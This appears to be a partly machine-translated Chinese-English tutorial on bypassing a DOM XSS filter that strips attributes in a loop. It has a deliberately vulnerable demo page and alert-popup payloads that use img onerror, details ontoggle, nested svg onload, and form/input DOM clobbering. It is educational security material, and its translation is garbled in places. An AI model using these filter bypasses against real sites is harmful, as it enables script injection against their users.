A circular problem

目的：

下面代码中的jsA loop delete statement deletes the attributes of the element we inserted,So our purpose is to bypass the following loop through the event attribute,也就是说让removeUseful properties are not removed,There are two ways to execute our malicious property completion popup.

两种方式分别是:

(1)Go into the loop without removing useful properties;
(2)不进循环,Malicious properties are executed before entering the loop.

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <!-- <form id=x>
        <input id=attributes>
        <input id=attributes>
    </form> -->
</body>
<script>
    // console.info(x.attributes);
    // http://127.0.0.1/domfilter/demo6.html#<img src=1 onerror=alert(1)>
    const data = decodeURIComponent(location.hash.substr(1));
    const root = document.createElement('div');
    root.innerHTML = data;

    // 这里模拟了XSS过滤的过程,方法是移除所有属性
    for (let el of root.querySelectorAll('*')) {
        for (let attr of el.attributes) {
            el.removeAttribute(attr.name);
        }
    }
    document.body.appendChild(root); 
</script>
</html>

运行代码,再使用imgTab for popup.

分析：

要实现让removeTo delete useless attributes, it is necessary to figure out the deletion process.

但是,There is also a problem in this delete code(Removed the first fetched propertysrc,But did not delete the latteronerror属性).And how to use this problem to achieve the purpose of bypassing and then executing the event attribute to trigger the pop-up window.

从上图我们可以看出,The code is only removed3个数,But there are all in the list6个数,这是为什么呢？

We analyze from the following code：

First give each number in the list in order from1The starting order is marked.

这是因为,His deletion process is executed in a loop,Delete while looping.

第一次循环：首先for循环从1开始,Knowing the sixth number is the maximum,把7选中,然后打印、删除.此时,列表a=[3,4,2,6,5].

第二次循环：The cycle has passed the first one3,到了第二位6.Loop again to find the largest number6,删除.此时,a=[3,4,2,5],
		  数字6的位置空出来了,数字5往前填充.

第三次循环：Start with the third digit2开始循环,找到最大的数5,删除.此时,列表a=[3,4,2].

第四次循环：Start looping from the fourth digit,然而现在aThere are only three of them,no four,此时循环结束.

如此,It can be explained.

实验

(1)Go into the loop without removing useful properties

要想imgTabs can pop up,就需要保留src和onerror这两个属性.

所以,Address code bits

<img%20 d=aaa src=1 f=sss onerror=alert(1) >

img标签的src和onerrorproperties are preserved,成功.

还可以使用details标签
payloada：

<details open ontoggle=alert(1)>

(2)不进循环,Execute malicious properties before entering the loop

This exploit is in addition to the disadvantage that a loop delete can be exploited within a tag to escapesvgtags to perform malicious pop-up effects .

payload:

<svg><svg/onload=alert(1)>

Two circular problems

The difference between the two loop deletions here and the one loop deletion is that the attributes are put into a new array for deletion through the second loop,Thereby avoiding the escape of malicious properties.Then the purpose is to execute our malicious properties in two ways to complete the pop-up window.

两种方式分别是:

(1)Go into the loop without removing useful properties
(2)不进循环

(1)Go into the loop without removing useful properties

(1)Entering the loop does not delete useful properties

To make the properties entering the loop take effect, you need to form an iterable object,i.e. put in twoid/nameIdentical tags form an iterable object(数组),Cyclic deletion is equivalent to fetchingform表单的属性attributes,而这个id/name就是两个相同id=attributes的input,Then delete bothinputin the formed arrayinput,and not deletedinput标签,所以form中的tabindexProperties are automatically locked(input标签),然后onfocusWill capture focus trigger popup.

HTML tabindex 属性：https://www.w3school.com.cn/tags/att_standard_tabindex.asp

payload：

<form%20tabindex=1%20onfocus="alert(1)"%20autofocus=true><input%20id=attributes><input%20id=attributes></form>

(2)不进循环

payload：

#<svg><svg/onload=alert(1)>

这里使用两个svg标签,The reason for this is that the code executes malicious properties before the loop executes,而使用一个svgLabel time code will not execute until after the loop executessvg标签,但是这时svgThe attributes inside the tag are all removed,So it can't be executed.